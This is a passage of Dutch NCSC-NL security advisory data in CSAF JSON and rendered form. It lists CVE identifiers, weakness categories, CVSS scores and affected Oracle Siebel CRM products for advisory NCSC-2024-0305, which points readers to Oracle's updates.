"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-22243"
},
{
"cve": "CVE-2024-22259",
"cwe": {
"id": "CWE-601",
"name": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)"
},
"notes": [
{
"category": "other",
"text": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
"title": "CWE-601"
},
{
"category": "other",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-22259",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-22259.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-22259"
},
{
"cve": "CVE-2024-22262",
"cwe": {
"id": "CWE-601",
"name": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)"
},
"notes": [
{
"category": "other",
"text": "URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
"title": "CWE-601"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-22262",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-22262.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-22262"
},
{
"cve": "CVE-2024-25062",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"notes": [
{
"category": "other",
"text": "Use After Free",
"title": "CWE-416"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-25062",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-25062.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-25062"
},
{
"cve": "CVE-2024-26308",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-226018",
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-26308",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-26308.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-226018",
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-26308"
},
{
"cve": "CVE-2024-29025",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-29025",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-29025.json"
}
],
"title": "CVE-2024-29025"
},
{
"cve": "CVE-2024-29857",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-271904"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-29857",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-29857.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-271904"
]
}
],
"title": "CVE-2024-29857"
}
]
}
NCSC-2024-0305
Vulnerability from csaf_ncscnl - Published: 2024-07-17 13:55 - Updated: 2024-07-17 13:55Summary
Kwetsbaarheden verholpen in Oracle Siebel CRM
Notes
The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:
NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.
NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.
This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings.
Feiten: Er zijn kwetsbaarheden verholpen in Oracle Siebel CRM.
Interpretaties: Een kwaadwillende kan de kwetsbaarheden misbruiken om aanvallen uit te voeren die kunnen leiden tot de volgende categorieën schade:
* Denial-of-Service (DoS)
* Toegang tot gevoelige gegevens
* Toegang tot systeemgegevens
* Manipulatie van gegevens
* (Remote) code execution (Gebruikersrechten)
Oplossingen: Oracle heeft updates beschikbaar gesteld om de kwetsbaarheden te verhelpen. Zie de referenties voor meer informatie.
Kans: medium
Schade: high
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine
CWE-158: Improper Neutralization of Null Byte or NUL Character
CWE-192: Integer Coercion Error
CWE-20: Improper Input Validation
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
CWE-295: Improper Certificate Validation
CWE-325: Missing Cryptographic Step
CWE-404: Improper Resource Shutdown or Release
CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CWE-502: Deserialization of Untrusted Data
CWE-681: Incorrect Conversion between Numeric Types
CWE-754: Improper Check for Unusual or Exceptional Conditions
CWE-770: Allocation of Resources Without Limits or Throttling
CWE-787: Out-of-bounds Write
CWE-770
- Allocation of Resources Without Limits or Throttling
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
CWE-192
- Integer Coercion Error
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
CWE-787
- Out-of-bounds Write
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
CWE-404
- Improper Resource Shutdown or Release
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
7.8 (High)
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
5.3 (Medium)
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
5.3 (Medium)
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm
oracle
|
cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
7.5 (High)
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
siebel_crm_cloud_applications
oracle
|
cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_deployment
oracle
|
cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_end_user
oracle
|
cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*
|
— | |
|
siebel_crm_integration
oracle
|
cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*
|
— |
References
26 references
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "nl",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
},
{
"category": "description",
"text": "Er zijn kwetsbaarheden verholpen in Oracle Siebel CRM.",
"title": "Feiten"
},
{
"category": "description",
"text": "Een kwaadwillende kan de kwetsbaarheden misbruiken om aanvallen uit te voeren die kunnen leiden tot de volgende categorie\u00ebn schade:\n\n* Denial-of-Service (DoS)\n* Toegang tot gevoelige gegevens\n* Toegang tot systeemgegevens\n* Manipulatie van gegevens\n* (Remote) code execution (Gebruikersrechten)",
"title": "Interpretaties"
},
{
"category": "description",
"text": "Oracle heeft updates beschikbaar gesteld om de kwetsbaarheden te verhelpen. Zie de referenties voor meer informatie.",
"title": "Oplossingen"
},
{
"category": "general",
"text": "medium",
"title": "Kans"
},
{
"category": "general",
"text": "high",
"title": "Schade"
},
{
"category": "general",
"text": "Improper Restriction of Operations within the Bounds of a Memory Buffer",
"title": "CWE-119"
},
{
"category": "general",
"text": "Improper Neutralization of Special Elements Used in a Template Engine",
"title": "CWE-1336"
},
{
"category": "general",
"text": "Improper Neutralization of Null Byte or NUL Character",
"title": "CWE-158"
},
{
"category": "general",
"text": "Integer Coercion Error",
"title": "CWE-192"
},
{
"category": "general",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "general",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "general",
"text": "Improper Certificate Validation",
"title": "CWE-295"
},
{
"category": "general",
"text": "Missing Cryptographic Step",
"title": "CWE-325"
},
{
"category": "general",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "general",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
},
{
"category": "general",
"text": "Deserialization of Untrusted Data",
"title": "CWE-502"
},
{
"category": "general",
"text": "Incorrect Conversion between Numeric Types",
"title": "CWE-681"
},
{
"category": "general",
"text": "Improper Check for Unusual or Exceptional Conditions",
"title": "CWE-754"
},
{
"category": "general",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "general",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "Nationaal Cyber Security Centrum",
"namespace": "https://www.ncsc.nl/"
},
"references": [
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36090"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-34169"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42003"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22081"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33201"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41105"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46589"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47627"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5072"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5678"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5764"
},
{
"category": "external",
"summary": "Reference - oracle",
"url": "https://www.oracle.com/docs/tech/security-alerts/cpujul2024csaf.json"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; ibm; nvd; oracle",
"url": "https://www.oracle.com/security-alerts/cpujul2024.html"
}
],
"title": "Kwetsbaarheden verholpen in Oracle Siebel CRM",
"tracking": {
"current_release_date": "2024-07-17T13:55:31.923970Z",
"id": "NCSC-2024-0305",
"initial_release_date": "2024-07-17T13:55:31.923970Z",
"revision_history": [
{
"date": "2024-07-17T13:55:31.923970Z",
"number": "0",
"summary": "Initiele versie"
}
],
"status": "final",
"version": "1.0.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "siebel_crm_cloud_applications",
"product": {
"name": "siebel_crm_cloud_applications",
"product_id": "CSAFPID-1503695",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:siebel_crm_cloud_applications:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "siebel_crm_deployment",
"product": {
"name": "siebel_crm_deployment",
"product_id": "CSAFPID-1503697",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:siebel_crm_deployment:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "siebel_crm_end_user",
"product": {
"name": "siebel_crm_end_user",
"product_id": "CSAFPID-1503700",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:siebel_crm_end_user:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "siebel_crm_integration",
"product": {
"name": "siebel_crm_integration",
"product_id": "CSAFPID-1503702",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:siebel_crm_integration:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "siebel_crm",
"product": {
"name": "siebel_crm",
"product_id": "CSAFPID-764293",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:siebel_crm:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "siebel_crm",
"product": {
"name": "siebel_crm",
"product_id": "CSAFPID-345046",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:siebel_crm:23.2:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_name",
"name": "siebel_crm",
"product": {
"name": "siebel_crm",
"product_id": "CSAFPID-220191",
"product_identification_helper": {
"cpe": "cpe:2.3:a:oracle:siebel_crm:23.5:*:*:*:*:*:*:*"
}
}
}
],
"category": "vendor",
"name": "oracle"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-36090",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2021-36090",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2021/CVE-2021-36090.json"
}
],
"title": "CVE-2021-36090"
},
{
"cve": "CVE-2022-34169",
"cwe": {
"id": "CWE-192",
"name": "Integer Coercion Error"
},
"notes": [
{
"category": "other",
"text": "Integer Coercion Error",
"title": "CWE-192"
},
{
"category": "other",
"text": "Incorrect Conversion between Numeric Types",
"title": "CWE-681"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-34169",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-34169.json"
}
],
"title": "CVE-2022-34169"
},
{
"cve": "CVE-2022-37434",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "other",
"text": "Improper Restriction of Operations within the Bounds of a Memory Buffer",
"title": "CWE-119"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-37434",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-37434.json"
}
],
"title": "CVE-2022-37434"
},
{
"cve": "CVE-2022-42003",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Deserialization of Untrusted Data",
"title": "CWE-502"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-42003",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2022/CVE-2022-42003.json"
}
],
"title": "CVE-2022-42003"
},
{
"cve": "CVE-2023-5072",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-5072",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-5072.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
}
],
"title": "CVE-2023-5072"
},
{
"cve": "CVE-2023-5678",
"cwe": {
"id": "CWE-754",
"name": "Improper Check for Unusual or Exceptional Conditions"
},
"notes": [
{
"category": "other",
"text": "Improper Check for Unusual or Exceptional Conditions",
"title": "CWE-754"
},
{
"category": "other",
"text": "Missing Cryptographic Step",
"title": "CWE-325"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-5678",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-5678.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
}
],
"title": "CVE-2023-5678"
},
{
"cve": "CVE-2023-5764",
"cwe": {
"id": "CWE-1336",
"name": "Improper Neutralization of Special Elements Used in a Template Engine"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Special Elements Used in a Template Engine",
"title": "CWE-1336"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-5764",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-5764.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
}
],
"title": "CVE-2023-5764"
},
{
"cve": "CVE-2023-22081",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Certificate Validation",
"title": "CWE-295"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-22081",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-22081.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
}
],
"title": "CVE-2023-22081"
},
{
"cve": "CVE-2023-33201",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764293",
"CSAFPID-1503695",
"CSAFPID-1503697",
"CSAFPID-1503700",
"CSAFPID-1503702"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-33201",
